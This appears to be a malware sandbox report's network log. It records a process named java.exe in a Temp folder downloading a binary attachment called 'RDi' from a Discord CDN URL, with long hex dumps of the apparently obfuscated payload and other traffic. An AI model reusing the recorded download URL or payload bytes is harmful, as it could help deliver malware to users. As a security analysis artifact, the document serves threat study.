                                                          2022-02-07 11:02:46 UTC136INData Raw: cf af 2f 2d 2e 2b 2a 29 28 27 27 25 24 23 22 21 dd 9f 1f 1d 1c 1b 1b 19 18 17 16 15 15 13 12 11 ef 8f 0d 0d 0c 0b 0a 09 09 07 06 05 14 13 03 01 ff 7f ff fd fd fb fa f9 f8 f7 f4 f5 f4 f3 f2 f1 0e 6f ef ed ec eb e8 e9 e8 e7 e6 e5 e5 e3 e2 e1 1f 5f dd dd dc db da d9 d9 d7 c9 c8 d4 d3 d0 d1 1f 52 cf cd cd cb 87 d4 c8 c7 c7 c5 c4 c3 c2 c1 3d 3f bf bd bc bb b9 b9 b8 b7 b6 b5 b0 b3 b2 b1 4f 2f ae ad ac ab aa a9 aa a7 a6 a5 a4 a3 a1 a1 5f 1f 9f 9d 9d 9b 9a 99 98 97 97 95 94 93 92 91 6d 0f 8f 8d 8c 8b 8b 89 88 87 86 85 86 83 82 81 7f ff 7c 7d 7c 7b 7a 79 79 77 76 75 74 73 70 71 8f ef 6f 6d 6f 6b 6a 69 68 67 67 65 64 63 62 61 9d df 5f 5d 5c 5b 5b 59 58 57 56 55 56 53 52 51 af cf 4e 4d 4c 4b 4a 49 49 47 46 45 44 43 43 41 bf bf 3f 3d 3e 3b 3a 39 38 37 35 35 34 33 32
                                                          Data Ascii: /-.+*)(''%$#"!o_R=?O/_m|}|{zyywvutspqomokjihggedcba_]\[[YXWVUVSRQNMLKJIIGFEDCCA?=>;:98755432
                                                          2022-02-07 11:02:46 UTC140INData Raw: ab a4 a9 68 e0 75 a5 aa a3 42 e6 8c 1f 91 9d 9c d3 49 99 96 97 b6 dd 47 93 9c 91 2f 47 5c 8d 82 8b ea c1 5b 87 88 85 04 cb 51 81 71 ff df 35 af 7b 74 79 b8 3f a5 75 7a 73 92 39 5c ef 61 6d 6c 22 b9 69 66 67 46 2c b7 63 6c 61 df 96 8c 5d 52 5b 3a 10 8b 57 58 55 d4 1a 81 51 a1 cf ef 04 9f 4b 44 49 88 0e 95 45 4a 43 a2 08 6c bf 31 3d 3c 71 e9 39 36 37 16 7f e7 33 3c 31 8f e5 fc 2d 22 2b 4a 63 fb 27 28 25 a4 69 f1 21 d1 9f bf 57 cf 1b 14 19 d8 5d c5 15 1a 13 f2 5b 3c 8f 01 0d 0c 40 d9 09 06 07 26 4e d7 03 0c 01 bf 34 2c fd f2 fb 9a b2 2b f7 f8 f5 74 b8 21 f1 01 6f 4f a6 3f eb e4 e9 28 ac 35 e5 ea e3 02 aa cc 5f d1 dd dc 97 09 d9 d6 d7 f6 99 07 d3 dc d1 6f 03 1c cd c2 cb aa 85 1b c7 c8 c5 44 8f 11 c1 31 3f 1f f1 6f bb b4 b9 78 fb 65 b5 ba b3 52 fd 9c 2f a1 ad
                                                          Data Ascii: huBIG/G\[Qq5{ty?uzs9\aml"ifgF,cla]R[:WXUQKDIEJCl1=<q9673<1-"+Jc'(%i!W][<@&N4,+t!oO?(5_oD1?oxeR/
                                                          2022-02-07 11:02:46 UTC144INData Raw: 52 66 46 45 66 13 e7 d0 2e 5a 65 22 40 78 48 76 6e 60 5d 13 20 70 d6 bb 7a 7a 5d 6f 66 44 3d 4b 4e 73 4b 3b 6b 60 85 11 bb a7 93 93 9f ae 9d f7 8f a2 a6 c2 c4 be 40 05 81 8f db d3 8c b9 bc ae a9 a6 d3 b1 83 8a 4a 19 ea 85 bf db 99 ec 8c 86 b2 ad bd a7 82 bf 60 01 a9 b4 8b 89 98 80 fc fe b0 9d a3 a1 ab ad 69 3f fe db e4 de cb 8c 89 f6 dc 81 cc d5 fc c0 3b 60 eb e4 e2 d8 ff f8 ef e8 97 f0 c6 a3 96 99 68 74 fd f3 ab d1 cd d7 d9 d2 e0 db d0 ab f3 f7 05 5b dc e7 f6 f8 e1 fe e6 87 ef c6 c0 cf d6 c5 10 bd 12 19 2e 17 1e 37 1d 06 07 22 24 31 18 49 d9 9e 3a 2a 6c 25 32 01 38 0e 34 24 13 2a 30 11 ae 87 6b 0f 29 10 14 30 12 60 00 66 15 3f 10 12 af 98 39 29 27 0f 27 06 02 14 16 71 33 0a 10 28 eb ed 6e 45 79 43 4f 68 71 54 5a 42 34 7c 70 7b 8e d8 56 4c 59 4f 53 58 45
                                                          Data Ascii: RfFEf.Ze"@xHvn`] pzz]ofD=KNsK;k`@J`i?;`ht[.7"$1I:*l%284$*0k)0`f?9)''q3(nEyCOhqTZB4|p{VLYOSXE
                                                          2022-02-07 11:02:46 UTC148INData Raw: d6 18 47 cf ab a8 ae ca fa db a6 dc 95 a0 dc c6 d3 21 3a c6 ef fa b9 c4 bb c6 f2 bf d2 ea c4 c4 ee 09 b9 39 2a 0e 0e 13 79 37 13 47 38 2c 3e 1b 47 bc be 0e 39 59 13 0e 05 07 24 0e 21 5c 5a 11 52 da e7 0e 5d 13 13 37 3e 33 60 03 03 61 0a 36 62 de 8e 1f 7e 35 2d 2e 2e 3c 35 30 1c 32 2b 2b 41 c9 cb 71 56 77 6d 78 60 0e 51 44 44 66 61 04 59 a7 ca 46 67 79 72 69 10 4b 48 40 25 10 15 65 42 98 a9 48 44 2a 6c 7c 2f 21 7a 27 59 5d 65 50 4b d8 c3 55 75 3d 49 46 09 52 61 4a 4b 6c 6e 52 40 95 2a 87 9b 9b c8 ca b0 c1 b0 ba bf 8d 97 81 82 47 19 a1 ed d8 89 db 84 9d 8a a8 9f 87 94 b3 8b 58 15 ee b7 8b 96 b8 90 a8 a1 97 98 e4 a0 b0 d1 58 3f a3 98 a6 bd fe f8 a4 82 94 83 a0 85 a8 91 0a 7d fd ff fb f2 cb f6 80 fd d5 b5 f1 dd c4 d8 3d 40 c1 c0 c9 c5 de a9 fb d7 c3 c6 cd c2
                                                          Data Ascii: G!:9*y7G8,>G9Y$!\ZR]7>3`a6b~5-..<502++AqVwmx`QDDfaYFgyriKH@%eBHD*l|/!z'Y]ePKUu=IFRaJKlnR@*GXX?}=@
                                                          2022-02-07 11:02:46 UTC152INData Raw: 5d 7f 7e 76 76 64 16 7d 78 50 67 54 83 bc 65 34 3f 78 58 59 6e 44 65 73 71 44 31 48 b5 09 c9 a9 aa b9 fa bd 91 94 82 9c 9b 9d 93 83 76 0f dd ed bf 92 99 9d 8d 8a c8 a6 8b 8f 8e 84 7c 2b b6 b2 b2 a8 f4 9e bd b9 b3 a7 bd b0 d2 e6 7b 3b 8d fe 8d fb ad a5 f8 8f 8f 8b fd b9 a3 a8 5d 76 d4 f7 ce f7 89 8b fc ed f7 b5 f8 da c1 c5 2f 1e af 9b f6 93 93 e8 d9 e5 dc c4 f4 c6 cf f8 1c 45 d5 f8 db cf cd de dc d0 c1 e7 a5 df 92 d9 3e 7c c7 bc c3 db f8 d0 e9 cd b2 b4 de d5 c7 b2 0d 96 38 44 33 29 2d 15 3d 14 76 33 46 05 14 3e c4 84 36 21 3d 1d 1b 2b 25 10 36 07 17 33 30 56 fd b7 6e 3e 0d 33 5a 0d 0b 6e 1c 21 66 03 39 19 c3 a5 3b 1c 1d 0c 2b 27 09 77 05 2c 35 76 29 2f d5 fe 7e 3d 57 6e 69 75 0f 72 58 77 06 46 51 60 ab f8 18 4c 66 69 41 45 6c 1f 67 7c 4b 67 66 60 df d0 74
                                                          Data Ascii: ]~vvd}xPgTe4?xXYnDesqD1Hv|+{;]v/E>|8D3)-=v3F>6!=+%630Vn>3Zn!f9;+'w,5v)/~=WniurXwFQ`LfiAElg|Kgf`t
                                                          2022-02-07 11:02:46 UTC156INData Raw: db d5 a7 ee d0 d0 de 1e 62 bf b8 cd fd cc cd ce d1 d1 d1 cd db f7 ec 7f bb 36 4e 10 31 2c 2b 0a 41 45 1d 40 3c 1f 38 ff bf 5b 1e 36 58 12 06 30 1d 1c 00 64 2e 24 07 dc 87 27 1a 2d 2b 6b 12 0f 02 24 19 22 29 3e 12 f9 ba 05 04 24 3f 09 05 48 0a 35 22 06 2c 3a 13 da cc 4a 51 48 3b 77 4a 5f 75 59 4d 67 47 4b 5d aa af 1b 43 48 12 1a 45 6c 12 16 15 6f 6e 70 5b ee f5 7c 6a 4e 7a 53 58 59 2f 7c 5d 59 13 51 7d 8e fc 7c 3e 53 51 65 67 6d 07 40 73 4d 34 7a 68 98 10 88 8d b8 b6 b1 b5 b7 92 a7 98 c5 bc 82 c7 4b 0d b5 8e 87 eb ae 8c 84 82 92 80 a2 8a 8e 84 1f 34 ba af b2 be b6 ea ea d7 93 b8 9b a2 9e b8 77 18 81 f4 fb ae a6 ba a7 83 93 a9 80 95 8d ab 0d 59 ed f9 fd bb 83 ec de e1 ff 85 ec ff d1 80 2e 5b e1 c2 fa 99 c8 fa c4 e5 e2 ec 90 ee d2 ed 34 1f f3 cd e9 e8 d1 d5
                                                          Data Ascii: b6N1,+AE@<8[6X0d.$'-+k$")>$?H5",:JQH;wJ_uYMgGK]CHElonp[|jNzSXY/|]YQ}|>SQegm@sM4zhK4wY.[4
                                                          2022-02-07 11:02:46 UTC159INData Raw: 0f 7c 41 47 6c 76 46 79 7e 64 ba f9 55 2d 54 6a 4c 18 6a 43 7f 42 56 10 54 54 8a ed 28 7b 7a 4c 68 49 6c 75 71 43 2c 45 78 11 ad e3 3d 69 68 48 47 5b 51 36 72 67 47 79 4d 4b bd 4c 89 cc 8d 99 cc ac 9f c0 97 b4 f4 83 9d a0 43 2a a4 be 89 9b d8 a7 8a d0 d6 ae 87 d6 d5 94 46 30 9b b3 8f 8a 90 bd d8 a3 e3 9d bf 86 82 e8 6e 04 8a f8 87 ad fc fc 86 b2 f7 83 85 84 83 82 4c 6a e5 e5 fd bb c2 ce d2 f5 83 fc fa d9 84 82 1d 6a c0 e3 ed da 9f ea ca ef d4 e7 cf d4 eb c3 15 1f dc f1 fd e8 e9 af c7 d0 f3 e1 db e3 e6 f8 00 61 fc 8d fe ba c3 e8 c5 f5 ed f1 f6 d1 c1 e4 1a 8c 14 0f 49 0b 13 0a 0f 3e 26 11 22 25 47 71 e3 9b 03 1d 2a 2a 5e 0b 0a 15 51 22 0e 3a 20 59 af bd 39 6e 6c 28 0e 1f 3c 25 14 55 05 23 38 15 e0 a3 17 19 7d 3d 2e 3c 3a 2e 2a 23 1e 0e 0f 35 ce db 50 04 6d
                                                          Data Ascii: |AGlvFy~dU-TjLjCBVTT({zLhIluqC,Ex=ihHG[Q6rgGyMKLC*F0nLjjaI>&"%Gq**^Q": Y9nl(<%U#8}=.<:.*#5Pm
                                                          2022-02-07 11:02:46 UTC164INData Raw: c1 f9 d2 fa c2 19 6b e3 98 ce 98 93 c2 9b e8 eb e2 c2 e4 a2 92 30 54 f6 da d9 c3 aa c8 f7 f2 f1 d6 e5 c7 f6 c6 04 61 d6 f4 ef df f9 e3 f8 ea 86 b3 d4 b1 e5 d4 29 b7 49 07 0e 37 2d 1b 1d 3b 32 4c 1b 41 11 38 d9 a3 2e 1b 5e 25 6a 3d 5d 3f 5e 23 02 0c 00 3b d3 92 1d 3b 36 0d 3f 3e 1b 02 05 38 07 01 35 09 e2 a1 4f 2b 39 04 06 0a 06 08 03 08 02 24 20 14 c6 d2 51 6b 0f 6c 62 56 4d 56 7e 7c 59 69 32 5d 8b e8 66 4f 15 6f 66 5c 60 6f 4b 4c 13 14 4c 18 ba ed 70 2d 51 68 58 7d 2d 5b 16 7c 6e 26 23 25 96 da 67 74 47 51 4e 79 4f 52 4b 3c 72 6f 35 5b 99 0a 8b ab 90 95 fa bc 93 c1 9e be ac a7 ab bf 5f 04 ad ae 86 a9 92 8b da d6 a5 ac b0 ac db b9 55 11 df 8a bd b6 ae 9d 8a ba e4 91 87 91 85 b4 69 77 ad f8 9e a6 ff 8a 91 ab 8b 92 9d 84 c2 a2 0f 53 ec f5 f4 cc 8f fe ef e2
                                                          Data Ascii: k0Ta)I7-;2LA8.^%j=]?^#;;6?>85O+9$ QklbVMV~|Yi2]fOof\`oKLLp-QhX}-[|n&#%gtGQNyORK<ro5[_UiwS
                                                          2022-02-07 11:02:46 UTC168INData Raw: cd ae 26 24 28 0b 2b 28 2d 23 06 24 21 2a 21 01 df 9d 17 ad 23 44 65 08 cd 1d 2c 12 12 06 00 55 ee 9d 37 0a 0a 1e 18 4d 09 15 32 02 02 16 10 45 fe 6d c2 fa fa ee e8 bd f9 e5 b6 f1 f4 f3 e0 c9 0b 6f ef ff d8 ef ea e9 fa da e2 e5 e4 f1 a2 e5 17 5f cd e5 d8 d3 da cb ec d3 de d5 c6 ee d6 d9 2f 5d 8f c9 ec ca c8 d5 cb e7 c6 cd c0 e3 c2 d3 32 3c 9f bd b2 bc aa b8 b9 a9 b6 ab b4 b4 82 b0 4e 2e bf b3 ac af aa a8 b4 bb a1 a3 b1 b1 e3 a0 4c 1f 9b bd 9c 88 9a 9d b0 97 85 95 97 95 80 d4 6c 09 9d c4 88 8b 8a 9b cd 83 86 85 96 ca 87 81 7e fe 6d 34 78 7b 7a 64 7d 71 76 74 66 7a 60 7c 88 ef 6d 7f 29 65 78 60 60 67 65 79 76 26 6c 73 d6 db 57 5d 4e 1e 5e 51 58 45 1f 51 5c 53 4f 54 ac c9 5d 01 48 4b 4a 5b 04 41 46 44 56 12 50 10 bb b7 3f 2f 70 38 3c 2b 6d 34 30 27 54 30 34
                                                          Data Ascii: &$(+(-#$!*!#De,U7M2Emo_/]2<N.Ll~m4x{zd}qvtfz`|m)ex``geyv&lsW]N^QXEQ\SOT]HKJ[AFDVP?/p8<+m40'T04
                                                          2022-02-07 11:02:46 UTC172INData Raw: ba 28 cc a1 a3 86 a4 aa ad a6 81 5f 02 9c b8 9b 8a 87 9c 8a 17 73 88 86 12 8b 99 7d 8e 96 9c 0d ae 98 09 6d 95 07 a4 96 02 9f 9c 7a e7 62 78 74 7e 78 7b 71 73 70 64 f6 4a 7b 51 8d ee 7e ef 55 7a eb 28 60 67 62 64 7c 7e 67 69 97 d9 7f 5c 5d 49 db 44 5e 50 54 47 d5 4e 5b 59 8f cd 4e 5f 7d 59 cb 60 4b 67 46 40 47 63 42 42 ba 9f 3f 2c bd 16 39 19 38 3a 35 15 34 37 31 11 cf a9 2c 0d 2c 27 29 09 28 2e 25 05 24 28 21 01 df 98 1a 3d 1d 06 1f 11 1e 37 16 08 06 92 27 15 cf 8f 1d 14 0f 2b 0a 11 0f 27 04 17 5d 0b 1f 02 fa 5f fd f3 f2 f5 fe d9 f8 e5 bf f0 d4 f3 e3 70 4e 67 cf ef ed f9 db fb 69 a2 e8 c5 e7 f1 63 fc 0e de fa cc 5d 92 cb 58 95 cf d1 dc c9 d6 cf d4 32 4a dd 4c 99 d9 4b ac da 47 23 d7 45 aa d0 41 a2 36 b9 9d bd ba ab 38 e5 b1 96 b4 b5 a2 33 d0 46 0f ad bf
                                                          Data Ascii: (_s}mzbxt~x{qspdJ{Q~Uz(`gbd|~gi\]ID^PTGN[YN_}Y`KgF@GcBB?,98:5471,,')(.%$(!=7'+']_pNgic]X2JLKG#EA683F


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.349755162.159.135.233443C:\Users\user\AppData\Local\Temp\java.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-02-07 11:03:22 UTC174OUTGET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1
                                                          Host: cdn.discordapp.com
                                                          Connection: Keep-Alive
                                                          2022-02-07 11:03:22 UTC174INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Feb 2022 11:03:22 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 177152
                                                          Connection: close
                                                          CF-Ray: 6d9c219cfd2769a3-FRA
                                                          Accept-Ranges: bytes
                                                          Age: 91310
                                                          Cache-Control: public, max-age=31536000
                                                          Content-Disposition: attachment;%20filename=RDi
                                                          ETag: "64a63f332c74248c2e4344632a8f0214"
                                                          Expires: Tue, 07 Feb 2023 11:03:22 GMT
                                                          Last-Modified: Sun, 06 Feb 2022 07:38:05 GMT
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: HIT
                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                          x-goog-generation: 1644133085557986
                                                          x-goog-hash: crc32c=gVbjfA==
                                                          x-goog-hash: md5=ZKY/Myx0JIwuQ0RjKo8CFA==
                                                          x-goog-metageneration: 1
                                                          x-goog-storage-class: STANDARD
                                                          x-goog-stored-content-encoding: identity
                                                          x-goog-stored-content-length: 177152
                                                          X-GUploader-UploadID: ADPycdtyKsvJu6hvTH26yIp181qo0KfUZH23agjnxI4-NGl3yHoFRaH-EJa4vKBUHv60B0LLNUcDA1hqOqXWjw6VpRXTncWD0Q
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8asoM38k2M7vNwEllT7OgPa3XHObKfdnwJjZGuvDx81XafkUsSQNRrJjG5Ur3bin2tMAoKuari2UnAgcBAAbXKleu5ei8NFkP51I9oGFiOkhlvfqmTghTmgIi3K7Kx0KqfmrGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          2022-02-07 11:03:22 UTC175INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                          2022-02-07 11:03:22 UTC175INData Raw: 42 35 7f ed ef eb ea e9 ec e7 e6 e5 1b 1c e2 e1 a7 5f df dd dc db da d9 98 d7 d6 d5 d4 d3 d2 d1 2f 4f cf cd cc cb ca c9 c8 c7 c6 c5 c4 c3 c2 c1 3f 3f bf bd bc bb ba b9 b8 b7 b6 b5 34 b3 b2 b1 41 30 15 a3 ac 1f a3 64 89 1f a7 e9 69 82 f6 c9 36 6c bf ed ee f4 fd eb f9 fa b6 f6 f5 fd fc fe 1b 2f ed e8 ac f9 ff e7 a8 ee e8 a5 c0 cc d1 a1 12 90 1b 18 52 76 77 73 5c 77 76 75 74 73 72 71 df aa 6f 6d 20 6a 69 69 05 dc ea 9b 64 63 62 61 9f df 5f 5d bc 5b 58 78 53 56 06 55 54 ff 50 51 af c9 4f 4d 4c 4b 4a 49 46 8c 44 45 44 63 42 41 bf 5f 3d 3d 3c 3b 3a 29 38 17 36 35 34 31 32 31 cb af 2f 2d 2c 2b 2a 29 2e 27 26 25 24 23 22 21 df bf 1c 1d 1c 19 1a 19 18 17 16 15 17 13 72 94 ef 8f 1f 0d 0c 1b 0a 09 08 07 16 05 04 13 02 01 ff 7f ff fd ec fb fa f9 f8 f7 f6 f5 f4 f3 f2
                                                          Data Ascii: B5_/O??4A0di6l/Rvws\wvutsrqom jiidcba_][XxSVUTPQOMLKJIFDEDcBA_==<;:)8654121/-,+*).'&%$#"!r
                                                          2022-02-07 11:03:22 UTC177INData Raw: 93 1d 30 df c8 25 65 1a 9b 0a 6a b3 f3 66 8b 69 8d 14 23 55 10 fc f6 b1 03 b9 6f 44 62 10 6d 1c 26 db 55 7f e0 44 88 3b 68 31 5e 41 00 1b cd 40 c3 4e 82 a5 5c 59 24 79 91 e2 60 e3 92 51 47 eb a8 54 c3 6f a8 29 a5 61 78 fb e1 0f f1 d0 4e 10 f6 14 9c d4 17 fa 43 3b bb 39 d1 d1 79 ff 7c f6 81 c9 52 7d b6 8b 3d ad b7 40 5a 90 1d ab c6 69 95 02 21 9e e1 b3 af 82 1a ee 09 e1 39 8a ae 20 39 59 47 23 73 97 11 0c db e3 1a bd a0 77 38 8a e2 ee 2a 64 20 ad dd 04 de 93 a8 08 d9 d6 6f 8e c1 89 12 3d f6 cb 7d ed f7 00 1a d0 5d eb 86 29 d5 42 61 de a1 f3 ef c2 5a ae 49 a1 79 ca ee 60 f9 99 87 e3 b3 57 d1 cc 1b 23 da 7d 60 b7 f8 4a 22 2e ea a4 e0 6d 1d c4 1e 53 68 c8 19 16 af 4e 75 e4 da c7 9d 89 d4 9f 9c c7 dc f3 93 d1 d3 11 42 02 62 c0 b8 1c f1 bb 7a 0b 22 c1 40 2e 8c
                                                          Data Ascii: 0%ejfi#UoDbm&UD;h1^A@N\Y$y`QGTo)axNC;9y|R}=@Zi!9 9YG#sw8*d o=}])BaZIy`W#}`J".mShNuBbz"@.
                                                          2022-02-07 11:03:22 UTC178INData Raw: 98 15 eb aa 4f 69 8b de 7a 36 41 45 72 05 ba eb a9 fd ea 72 15 2d 91 37 01 0b fe 61 02 2d 21 87 0b e6 d7 3f ce 4b 8d 83 5d 9f 7c d9 e2 60 67 1c c1 27 ef f7 51 05 cf 60 d8 3c 1f 71 8e 9a 5e 54 04 8e 49 82 21 cf ca b7 8b d7 de 6b 03 43 22 05 3a 37 dd a8 56 2f 39 33 8c ea b0 40 96 e5 71 13 b9 67 fc a9 3f 09 c1 a2 3d a1 43 f7 60 54 8c d5 66 78 6c 18 4a 6b b5 cf fb 4c 38 ba 07 12 e7 c3 57 b6 e6 cc a6 2a 27 97 44 bc 07 3a ea 8e 9b 67 b7 d3 4b b5 17 b1 e0 e6 a6 1b e7 e3 67 cd e6 4e 43 95 97 2b 58 ec b3 79 2d d9 83 0d 2b 8e 2e 6d fd 9e fa 4c 65 70 b9 f6 be b6 1e 0c 0d 5d 1d a5 96 65 1f 41 8f ad 58 a5 8e 15 eb fd ba 06 b9 1d b3 e7 dd c5 8d 9e 4f a3 08 55 ed 81 02 ff 7c d6 0b e1 3c b7 42 0c 15 40 c8 d5 bf b6 10 9d 6b fa 9f 4b 4a e5 18 a3 54 bd 43 7f 60 d9 09 12 46
                                                          Data Ascii: Oiz6AErr-7a-!?K]|`g'Q`<q^TI!kC":7V/93@qg?=C`TfxlJkL8W*'D:gKgNC+Xy-+.mLep]eAXOU|<B@kKJTC`F
                                                          2022-02-07 11:03:22 UTC179INData Raw: 03 4c cf 5d 59 e2 13 7a 2f c8 7e fb 98 f6 d5 0a 34 b5 d3 b0 d0 7b 7a 30 c1 47 52 37 65 e1 da 13 ac 9d 7c 29 3f 7e 6e 34 f9 26 29 09 ca 64 e1 1a 8d 31 4e dd a5 f7 72 ce ed e8 06 5d 54 a0 2f 6f 94 63 9f 9e d5 bd 1b 96 0b 1c 11 5b 18 50 7f 34 94 67 25 d3 aa ac 34 45 72 ec 6e 2e a6 f7 c1 8e af 7f 47 dd bb 9a 62 9b d6 4c 02 1a da d9 f4 b4 f2 71 09 de eb a8 12 dc 54 74 dc 74 79 c7 f8 ef d6 9e 49 ba 6f 70 9d b4 8c 76 8d ad 45 95 2c 87 75 76 fe 33 65 5e bd 57 3b 98 94 57 82 9f 6c 0d e0 53 f2 96 47 78 77 d5 75 8f 0a b8 a9 3e 75 9d dd 30 b1 28 64 b5 5c 9d 2b e9 0b b5 17 a5 d6 9f 99 6d 10 ab 5a 1c f1 45 e1 1b b0 8e 8a 6d 34 c3 45 64 d3 47 02 16 a1 e4 8a 3e af 92 95 92 f0 d0 df 6c e5 d9 c2 67 e6 bf 65 39 cd 0f ce 35 3a fa 0d 04 4a 49 28 da 0c d7 0b 57 58 bf 45 28 37
                                                          Data Ascii: L]Yz/~4{z0GR7e|)?~n4&)d1Nr]T/oc[P4g%4Ern.GbLqTttyIopvE,uv3e^W;WlSGxwu>u0(d\+mZEm4EdG>lge95:JI(WXE(7
                                                          2022-02-07 11:03:22 UTC181INData Raw: 03 d9 8b 8c af ac c1 57 e4 4f 77 0f e5 49 36 2d 61 ff e6 b1 74 7e 44 62 80 cf fa de cb a1 6c 59 c1 02 d3 c2 90 db cc 5b 2c 04 7e d8 4e 9e 94 d7 39 fd a6 59 bb 66 25 76 f5 d4 7f 16 d7 82 1f e6 83 fb 90 46 de de c7 e0 ec a2 f4 f8 a4 9b c3 15 8e d0 33 48 eb ca 7c 57 f0 3f 55 37 87 82 c2 30 5c cb dd 7e d2 b7 6f 7e d3 4d 3e 88 0a 71 74 0b 5e bb 4c bd 8d 62 a3 11 38 3c fe 64 60 7d e0 56 ab cc 61 5a bf a5 e4 79 ed 04 1b 18 2c ac b6 66 5d 17 96 bb 8e 99 b9 bb b6 69 94 73 a5 9b 22 5a 82 1e 2b 62 41 75 5d 99 c2 de 4c d4 12 3b 30 7c a7 ca 1d 0d 4b 65 7a 72 f8 22 e3 b9 9c 45 f7 cd b7 1b b1 ff 4f f4 e2 1e cb a2 1e a9 fe 33 b7 56 5a 4a 4d 15 fd 38 76 a3 8d 4b e9 09 a7 77 79 0b 44 c4 f8 61 23 da 06 b8 ae 24 90 68 fa 8b d1 78 fe 46 80 bc e2 86 2a e5 20 00 fa d7 fb 80 57
                                                          Data Ascii: WOwI6-at~DblY[,~N9Yf%vF3H|W?U70\~o~M>qt^Lb8<d`}VaZy,f]is"Z+bAu]L;0|Kezr"EO3VZJM8vKwyDa#$hxF* W
                                                          2022-02-07 11:03:22 UTC182INData Raw: a4 42 36 12 4d 22 ea 7f 75 44 dd f9 85 02 8b b9 56 4e 1a 70 6f 85 32 9e ea 59 21 b8 84 a2 70 68 8a e6 2b 95 51 c0 8d 3d 1d ad 2c 45 a6 73 32 53 64 21 79 f2 da b7 2b 25 a8 4e de 7c e6 c3 53 f1 30 3e 7e 78 40 58 2f c4 f2 be f0 e0 ab cf 67 ed 28 d8 6b 21 75 a0 d4 2f eb 6a 01 a0 95 de d8 18 32 65 5d c9 34 5c 6c 86 cf b3 3b 9e e5 8b ad 83 b7 02 7f b9 48 83 9a 86 0d ec 86 d5 f4 02 dd 31 2b 51 51 11 38 b1 ab d8 48 83 e9 65 d4 80 7f 12 44 7a 3d 5e 74 34 92 1f 70 33 3b 4b 54 81 d9 d5 16 df b6 a1 69 96 5f 1d 50 80 c1 c2 5a 3b 75 6b 2b 04 d5 54 3d 95 6d 63 e3 f3 4a c8 d3 58 11 84 23 e5 5b 9c 06 09 c7 3d eb f3 09 bf 79 10 e5 f9 22 34 b2 a0 d4 d8 05 40 50 cb a2 46 76 bd 88 f5 0b bd f5 d5 d8 dd 10 ea f4 ef d9 1e 66 60 ef b2 1c 39 6c 95 ba 54 9b 47 b7 7c b1 40 b9 3c 9c
                                                          Data Ascii: B6M"uDVNpo2Y!ph+Q=,Es2Sd!y+%N|S0>~x@X/g(k!u/j2e]4\l;H1+QQ8HeDz=^t4p3;KTi_PZ;uk+T=mcJX#[=y"4@PFvf`9lTG|@<
                                                          2022-02-07 11:03:22 UTC183INData Raw: d7 0a 12 f9 2a 2c 50 8a 72 92 b5 b7 73 62 70 e2 eb 53 6f 30 47 9c d1 42 ec 36 d8 dd 20 eb 09 2c 58 95 ee da a6 b0 6d fe fd a1 31 3a a8 52 ca 86 61 dd 8a c5 6a 6d 8c 77 0f 51 ae 77 83 12 92 ac 76 40 04 d3 9e 0e 20 30 ab c9 09 c4 df ce 8d c8 2c 7f d3 3b a3 53 97 ac 76 26 5f a5 f0 c9 35 8b 75 23 fa 7a 5e 48 c5 b4 a5 35 1e 93 f6 30 2d 25 f0 37 7d 37 83 7c b8 16 c4 8e 21 26 2c 08 a0 c3 0a ff 4b 1d cf 55 40 20 02 96 6f ef ad 71 40 91 3e 67 fc 58 bc 06 de b2 52 de 29 71 59 65 a7 8c 19 c8 e4 6c a6 87 31 b4 ab 41 fd 20 d0 aa c9 89 6e ef 56 0d 58 5e 70 11 02 c9 df 5c 3a 2a f7 cd 33 8f 6b 33 10 60 25 b9 8a b2 dc 65 81 0b 9b ac d8 38 d4 7b 56 00 1b d3 c6 50 ec a1 53 8f 4a 2a 4f bf 33 0f 27 0c 7a 16 cf 8e 11 a7 89 6b c6 ea 5a 21 c7 45 a4 d3 b4 6a b1 98 9c 37 0b 67 ec
                                                          Data Ascii: *,PrsbpSo0GB6 ,Xm1:RajmwQwv@ 0,;Sv&_5u#z^H50-%7}7|!&,KU@ oq@>gXR)qYel1A nVX^p\:*3k3`%e8{VPSJ*O3'zkZ!Ej7g
                                                          2022-02-07 11:03:22 UTC185INData Raw: 83 26 aa 73 9e 5d 7f 68 04 52 3d 76 f4 fb df 1b ae 66 b4 cb 73 17 f7 47 d9 20 26 34 9b 76 ca cb d9 ec 4d 23 56 40 c1 ed 7a d3 b8 1a 7e f2 82 22 e6 ba d2 e9 ab fb 43 d7 f2 2e 90 28 1e 60 a6 58 99 f5 a6 14 a8 6d 4f 7a 67 b4 97 74 c6 33 9a 38 49 3a a9 5f f5 17 c7 39 a9 c0 66 3d 35 7a 64 81 36 84 2b 78 d3 16 79 1c 47 58 e9 42 84 6f 72 9a 70 cb 64 00 76 57 16 cb b4 1b ab e1 c8 92 54 bd f3 48 af be ce ab 5f 57 21 c2 4c d9 3f 95 63 e3 25 1a 55 8c 1d f2 b1 fc e4 fa 16 d1 5c 9f 57 b8 bf f6 ea f2 46 cb 03 c2 f1 e8 72 c3 39 4e ff fb 1e 0f 0d ba f3 f2 37 be b9 dc c8 d4 32 8f f5 0f b2 6c f4 b4 c7 42 d3 4f 2c 68 58 18 bd d0 c0 31 23 9f 1e 10 61 3c 28 7b 1a d1 e7 85 21 6b 14 65 4a 07 56 3a c1 97 c2 65 99 8e be 95 91 da 29 d7 89 61 70 a3 0a cb 65 49 2d c8 ff 34 56 8a b3
